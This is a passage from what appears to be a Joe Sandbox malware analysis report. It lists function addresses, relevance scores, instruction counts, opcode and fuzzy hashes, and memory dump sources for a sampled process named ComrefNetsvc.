                                                                                  • Opcode ID: 108875c65e9df988b624c25af7728f205e9d9622c9e1329322b6132c9b3c1b67
                                                                                  • Instruction ID: 81391d998880498ddff4a8bdfda593c1e72d278163be8b27256c2d0e9bac3acd
                                                                                  • Opcode Fuzzy Hash: 108875c65e9df988b624c25af7728f205e9d9622c9e1329322b6132c9b3c1b67
                                                                                  • Instruction Fuzzy Hash: FC81D430A0AF0A8FD369CB54D0A457177E1FF44300B52457DC4ABC7AA2DA3AB942CB85
                                                                                  Function 00007FFD9BE8C770 Relevance: .2, Instructions: 209COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b5fec265f81350d6e13c6cad093783892d673e34d2b80920ee97c297f5920969
                                                                                  • Instruction ID: ec060c00fdbb71e6dfdcee73d8fdf5aad6d05872e21f46054260d757877353c7
                                                                                  • Opcode Fuzzy Hash: b5fec265f81350d6e13c6cad093783892d673e34d2b80920ee97c297f5920969
                                                                                  • Instruction Fuzzy Hash: B671F531E0EE4D5FEBA8DB6488656A87BE1FF16310F0041FED06DC72A2DE352A448B41
                                                                                  Function 00007FFD9BE891C2 Relevance: .2, Instructions: 203COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1a305e3ddbed0b1faef5ac31bedf939af85a592b108772d930249f804d8f125b
                                                                                  • Instruction ID: 0fd2ac94a8afa4a2b99c86df6e7f8b18bfb9e855d3da302409f0bc1925c5cd01
                                                                                  • Opcode Fuzzy Hash: 1a305e3ddbed0b1faef5ac31bedf939af85a592b108772d930249f804d8f125b
                                                                                  • Instruction Fuzzy Hash: 17511835F19D4D8FE7A8DF6C98A9A7833D1FF98310B050179E52EC76A2DE39A9018740
                                                                                  Function 00007FFD9BE8ABBD Relevance: .2, Instructions: 172COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f6d52b05830787d57471133c438d93425ce298f3d11c35721a81f6cb6bdca45d
                                                                                  • Instruction ID: 5666d7295521db94541f26422b3306e36ce89cdd481218be7aa4e5bb7bb3512e
                                                                                  • Opcode Fuzzy Hash: f6d52b05830787d57471133c438d93425ce298f3d11c35721a81f6cb6bdca45d
                                                                                  • Instruction Fuzzy Hash: C351F732B09D0E4FE758DBACC0619B9B7A6FF84314B514279D06EC7292DF39B9128780
                                                                                  Function 00007FFD9BE86000 Relevance: .2, Instructions: 151COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9b0db497811b89e21182651a24b4c5c1b17231a1b6fc39004ed4d9d3ce3963e0
                                                                                  • Instruction ID: 3a57878a7c87b7393380331242fe88803168399c5f3d5ece3cbc051a637f9610
                                                                                  • Opcode Fuzzy Hash: 9b0db497811b89e21182651a24b4c5c1b17231a1b6fc39004ed4d9d3ce3963e0
                                                                                  • Instruction Fuzzy Hash: EB51AE30B19D0A4FE799EB68C0A16A4B3E5FF58300F418279C01EC7A96DF39F9518B80
                                                                                  Function 00007FFD9BAA090D Relevance: .2, Instructions: 150COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 304f4b09042d04c615d7a8565132db6e75a455453ef052c01e01150524d386b3
                                                                                  • Instruction ID: 454b70f75fda91f03794c7c1d5ccf6fdd6803f85d2f4770430bac6ce666361b5
                                                                                  • Opcode Fuzzy Hash: 304f4b09042d04c615d7a8565132db6e75a455453ef052c01e01150524d386b3
                                                                                  • Instruction Fuzzy Hash: 9F416B12B0D5691EE328B7BCA4AA5F97B81DF59336B0404FFD04ECB1E3CD0868418395
                                                                                  Function 00007FFD9BE8AE8F Relevance: .1, Instructions: 139COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e0fc7f7ba896c83c520945d7875cb46df8a898a9b7985acd639299e76ebc8722
                                                                                  • Instruction ID: 4f480afe1825eaf3b153b0c0736ac076d17459a0809563f7eca4fe9d4d1be029
                                                                                  • Opcode Fuzzy Hash: e0fc7f7ba896c83c520945d7875cb46df8a898a9b7985acd639299e76ebc8722
                                                                                  • Instruction Fuzzy Hash: 1C41F861A0FFCE0FE77756B448354A47FA4AF43210B0A11FBD09DCA0A3D96A5A46C352
                                                                                  Function 00007FFD9BE88F9A Relevance: .1, Instructions: 128COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4beb49939bfe23f151f646cfe9a7c8ac4b9e5e395586c04b4503697f556a3ecd
                                                                                  • Instruction ID: 9a262d37a6fcf0728b57c56db25160735f84c4ce7c8329fab5dfca3f21101608
                                                                                  • Opcode Fuzzy Hash: 4beb49939bfe23f151f646cfe9a7c8ac4b9e5e395586c04b4503697f556a3ecd
                                                                                  • Instruction Fuzzy Hash: B4417F30E0DE4E8FDF95DB98C8A49AD7BB1FF59300F1501AAD01AD72A2CA35A905CB40
                                                                                  Function 00007FFD9BAA0998 Relevance: .1, Instructions: 128COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f98e1e06d76a0d295d2aef5bd532b7b2c9e8ef507dbd75a6dc0de387899a3685
                                                                                  • Instruction ID: 8db05231edd7dcdcad8bfef656b97f8441d685ebb8854504871de044ea0ec150
                                                                                  • Opcode Fuzzy Hash: f98e1e06d76a0d295d2aef5bd532b7b2c9e8ef507dbd75a6dc0de387899a3685
                                                                                  • Instruction Fuzzy Hash: B1311620B1E95D4FEBA8AB6884AA67577C2EF98320F0500BAE40DC32F3DD58AC418751
                                                                                  Function 00007FFD9BE86A70 Relevance: .1, Instructions: 127COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ee31842daf8f345e684ad2341e3df035850a47c0efacfa9eb8eee96aa0a7e04c
                                                                                  • Instruction ID: 36e4e7ee3d83b7f4214e538a1c1981852baa450708e521a3d5504775c6bc8b39
                                                                                  • Opcode Fuzzy Hash: ee31842daf8f345e684ad2341e3df035850a47c0efacfa9eb8eee96aa0a7e04c
                                                                                  • Instruction Fuzzy Hash: 41413930A1DC6E8EEBB8CA9484757B877A1FF54304F1185F9C06EC71A6DD396A808781
                                                                                  Function 00007FFD9BE8DA47 Relevance: .1, Instructions: 127COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0454a0d768363cd6cd19a28d019998ea5113ead929098659590c8aba2431491a
                                                                                  • Instruction ID: ebdd88959ce81ecedd8ee7bba791d0ea51ac73547adf25f36592ba7c6a52eeab
                                                                                  • Opcode Fuzzy Hash: 0454a0d768363cd6cd19a28d019998ea5113ead929098659590c8aba2431491a
                                                                                  • Instruction Fuzzy Hash: 17416F3260CD098FDF98EF58C4A5DA4B3E1FBA9360B0445AED05EC71A6DE31E945CB81
                                                                                  Function 00007FFD9BE87D47 Relevance: .1, Instructions: 127COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 75201336a96b4f35d080659edca1471801c57f078f953fba39465cff02580ab5
                                                                                  • Instruction ID: b16149351f1cb902198e92f2063fb4def0aa949b186cab662f167f9ef0787ddb
                                                                                  • Opcode Fuzzy Hash: 75201336a96b4f35d080659edca1471801c57f078f953fba39465cff02580ab5
                                                                                  • Instruction Fuzzy Hash: 3C41503160DD088FDF99EF58C4A5DA4B3E1FBA9320B0402AAD05AC7196DE25ED458B81
                                                                                  Function 00007FFD9BE80497 Relevance: .1, Instructions: 127COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6f882329a582f2bf4c741476da5bf6936b3af3c34fe914275f5e8f7db26b9f0a
                                                                                  • Instruction ID: 18cf392f0ef528c5f3336bbe4a3b44a7f407924644c53559d50519df9c7fdf5f
                                                                                  • Opcode Fuzzy Hash: 6f882329a582f2bf4c741476da5bf6936b3af3c34fe914275f5e8f7db26b9f0a
                                                                                  • Instruction Fuzzy Hash: 6641803260DD488FDF98EF58D4A5AA573E1FFA9320B0505AAD05EC7296DE31EC44CB81
                                                                                  Function 00007FFD9BE8DAF1 Relevance: .1, Instructions: 120COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4b993d2e5b83dcffddeb215577ef128d8d806ecb9f71ae7a8e8a0c0fa6834dce
                                                                                  • Instruction ID: 3aac669749dfb571c361c212800c6eef4295307c52af8e2a072c5d7e481fbbd8
                                                                                  • Opcode Fuzzy Hash: 4b993d2e5b83dcffddeb215577ef128d8d806ecb9f71ae7a8e8a0c0fa6834dce
                                                                                  • Instruction Fuzzy Hash: 2231A03160CD488FDF98EF18C4A5D64B3E1FFA936470446AED05EC71A6DE21E844CB81
                                                                                  Function 00007FFD9BE87DF1 Relevance: .1, Instructions: 120COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 767479040f47e081343a37db4d34ce6a3b10e8b12229e9b24d4bdeca6a378b2f
                                                                                  • Instruction ID: 5e6ea7aa0a174446589e30770f6b195083f4e016cab26f86131a49b80b41d678
                                                                                  • Opcode Fuzzy Hash: 767479040f47e081343a37db4d34ce6a3b10e8b12229e9b24d4bdeca6a378b2f
                                                                                  • Instruction Fuzzy Hash: 42316E3160DD488FDB9DEF28C4A5E64B3E1FBA931070406AED05AC71A6DE25EC408B81
                                                                                  Function 00007FFD9BE80541 Relevance: .1, Instructions: 120COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7b0681c86b74cbd63a846e10a5c348865c1603e2c13a1efb845de3db9ddb020a
                                                                                  • Instruction ID: 96d3bf80a3ba6391be944ed8c5a70d7b2ed9153f78c23f4078ab35195bb802e3
                                                                                  • Opcode Fuzzy Hash: 7b0681c86b74cbd63a846e10a5c348865c1603e2c13a1efb845de3db9ddb020a
                                                                                  • Instruction Fuzzy Hash: 57317E3160DD488FDF9CEF18C4A5A6573E1FF69311B0506AAD05EC7296DE21EC44CB81
                                                                                  Function 00007FFD9BAA0908 Relevance: .1, Instructions: 118COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: de9f5995c7ddd207417c403c0edba5acc1298c2d9f4c6f67d6adcb248044a827
                                                                                  • Instruction ID: ccf4f60de53376f9450caac317e2327f55afb976d084c61793de7f9d251b6849
                                                                                  • Opcode Fuzzy Hash: de9f5995c7ddd207417c403c0edba5acc1298c2d9f4c6f67d6adcb248044a827
                                                                                  • Instruction Fuzzy Hash: BC21F63130DC184FEB68EB4CE89ADB977D1EB9932131101BAE58EC7176E951EC8287C1
                                                                                  Function 00007FFD9BEA229E Relevance: .1, Instructions: 116COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c1a7086a558cd2e511900812ed0ae05de9c77dace55457bab5261a06c028e012
                                                                                  • Instruction ID: d94c3f00ace75eec6ba42b52baf35c1b76a7e92dfd80c67edb4416fdcc5c6085
                                                                                  • Opcode Fuzzy Hash: c1a7086a558cd2e511900812ed0ae05de9c77dace55457bab5261a06c028e012
                                                                                  • Instruction Fuzzy Hash: 8F317D9260F78A2FE76946A498264F23BDCDF57230B0501FBD4C9E70A3D94F69438391
                                                                                  Function 00007FFD9BAA0960 Relevance: .1, Instructions: 116COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fd67343ba0324c39e3476ef0f95286649914ab748ebbb9aac0f40155a1568698
                                                                                  • Instruction ID: 8ac0a50f6de62a2c059fa894dbfc6ad77146ce6777e7b6bc6b215f0a21b8821d
                                                                                  • Opcode Fuzzy Hash: fd67343ba0324c39e3476ef0f95286649914ab748ebbb9aac0f40155a1568698
                                                                                  • Instruction Fuzzy Hash: A4313611B0E96A1AE368B7BC64AA5F977C2DF59336F0505FBE40EC71E7CC086C418295
                                                                                  Function 00007FFD9BE8DA8B Relevance: .1, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 423488b7a16210cd4022622bf86db8981e354f3b8313206267ed2ae1bba8cb44
                                                                                  • Instruction ID: 8867bebc40bbad7cabc584e7733d02461806d5009ff81813f9ba887081ef11b8
                                                                                  • Opcode Fuzzy Hash: 423488b7a16210cd4022622bf86db8981e354f3b8313206267ed2ae1bba8cb44
                                                                                  • Instruction Fuzzy Hash: D531723160CD098FDF98EF58C4A5DA4B3E1FB6836070445AED05EC71A6DE35E845CB81
                                                                                  Function 00007FFD9BE87D8B Relevance: .1, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 47ad08150cc753828d5fcd548855e8b94a3c4c913f6ae92cb59517dc7a1fa5b1
                                                                                  • Instruction ID: 013b0b4062b1d8e47733faac9e5f4fff257ad6b0806256d73ccafabd9bc5a3ba
                                                                                  • Opcode Fuzzy Hash: 47ad08150cc753828d5fcd548855e8b94a3c4c913f6ae92cb59517dc7a1fa5b1
                                                                                  • Instruction Fuzzy Hash: 88315F3160DD098FDF99EF28C4A5DA4B3E1FB6931071406AED05AC71A6DE25EC41CB81
                                                                                  Function 00007FFD9BE804DB Relevance: .1, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 51501c07933a2cc05777ea77c67771bc9cffd007a61a6ee535b25a6fe94cac42
                                                                                  • Instruction ID: 053c98201acf42d66169b6283c7cddef69ab07b99510588bd2238b4b1d0b3f86
                                                                                  • Opcode Fuzzy Hash: 51501c07933a2cc05777ea77c67771bc9cffd007a61a6ee535b25a6fe94cac42
                                                                                  • Instruction Fuzzy Hash: 86318D3160DD498FDFA8EF18C4A5AA573E2FF69310B0505AAD05EC72A6DE21E845CB81
                                                                                  Function 00007FFD9BE855ED Relevance: .1, Instructions: 112COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c44eff6898d3dba7fd4551c1c069d684100dc3e89345eed67f96ef5e6b326cba
                                                                                  • Instruction ID: 7103fe6e9261fa372226b6313d5f637a3a760636ca480ad71564c345c1ede0d5
                                                                                  • Opcode Fuzzy Hash: c44eff6898d3dba7fd4551c1c069d684100dc3e89345eed67f96ef5e6b326cba
                                                                                  • Instruction Fuzzy Hash: 59312931B1EF4A8FE3785AA8446507477F8EF06310716067ED4DFC31A2DD2A7A025342
                                                                                  Function 00007FFD9BE8AC7A Relevance: .1, Instructions: 99COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 400f53e18433ed026bec5ded69ffe25a683829bdcd4e0cf98787c41c9998f0d8
                                                                                  • Instruction ID: f8324936f0e74ecebe1d8e036f8aec41b7758febd1d2f9c2870725e4ba9e0ac1
                                                                                  • Opcode Fuzzy Hash: 400f53e18433ed026bec5ded69ffe25a683829bdcd4e0cf98787c41c9998f0d8
                                                                                  • Instruction Fuzzy Hash: D5315C31B0DE4E0FE769D7A884626E877D1FF44314F451179D06EC71E2EE3A65028381
                                                                                  Function 00007FFD9BE87B55 Relevance: .1, Instructions: 98COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ccc0210f3cbcaafd9756ffda1b28eb5758e1015568ec64ff4e73a86f2af7c410
                                                                                  • Instruction ID: e205979482702964f553afa279057ada6ac3b5b59a4d9d94bae600959641b887
                                                                                  • Opcode Fuzzy Hash: ccc0210f3cbcaafd9756ffda1b28eb5758e1015568ec64ff4e73a86f2af7c410
                                                                                  • Instruction Fuzzy Hash: 6C313B31A1ED4ECFEBB8DB8484A15BD77B6FF48300F51017AD42ED72A1DA3A6A408745
                                                                                  Function 00007FFD9BAA6F86 Relevance: .1, Instructions: 96COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9198af7f000e41e3d0d4d99da677d7a7d3cda6ae7014535dc973cf741cf3cfda
                                                                                  • Instruction ID: 91900af7027c8643543473c4a908a4858987fba311d20b76559e81bd9a60ffa6
                                                                                  • Opcode Fuzzy Hash: 9198af7f000e41e3d0d4d99da677d7a7d3cda6ae7014535dc973cf741cf3cfda
                                                                                  • Instruction Fuzzy Hash: D131F061B1990E8FEBB4EB5884B47BC62D3EF58700F4640B6D40DD72A2DEA86E458B10
                                                                                  Function 00007FFD9BE802A5 Relevance: .1, Instructions: 95COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2e49789d43e0a4c2a4952ba43d2dea809213a20f20940c09e5c7dfd78ad70595
                                                                                  • Instruction ID: a04d6c1f2f995601738a69f833ea9bd6baeca9139619209b1b16b36c3c9cac56
                                                                                  • Opcode Fuzzy Hash: 2e49789d43e0a4c2a4952ba43d2dea809213a20f20940c09e5c7dfd78ad70595
                                                                                  • Instruction Fuzzy Hash: B1314C30A1ED4ECFDBA8DB8484A15BD77A5FF44701F52007AD02ED61A2DB3A6E009745
                                                                                  Function 00007FFD9BAA116D Relevance: .1, Instructions: 92COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1742f10f404453976b7df40a40cd1c357240234c1e41feefcdf23783f9de8513
                                                                                  • Instruction ID: e8abe92fa62d9e8d2631e3db8ac42e21374580183f7d5d6f9e0a438380133ad5
                                                                                  • Opcode Fuzzy Hash: 1742f10f404453976b7df40a40cd1c357240234c1e41feefcdf23783f9de8513
                                                                                  • Instruction Fuzzy Hash: CC31D831A0964E8FDB55EB68C864AFD7BF1FF6A310F0505BBC009D71A2DB68A540CB50
                                                                                  Function 00007FFD9BE885F0 Relevance: .1, Instructions: 88COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 922815f8b8e681441ec5ec477bce8d9e505adc4554f3f08198d428ba2e045675
                                                                                  • Instruction ID: f69e5ad29b66bb55b2cb74f05aeae5debe2007df66ed23f0c7868d0416d3890f
                                                                                  • Opcode Fuzzy Hash: 922815f8b8e681441ec5ec477bce8d9e505adc4554f3f08198d428ba2e045675
                                                                                  • Instruction Fuzzy Hash: EB311A30E1AD0ECFEBA8DF9894615BD77B9FF44300F51407ED02ED21A1DA7A6A409B81
                                                                                  Function 00007FFD9BE86A43 Relevance: .1, Instructions: 87COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
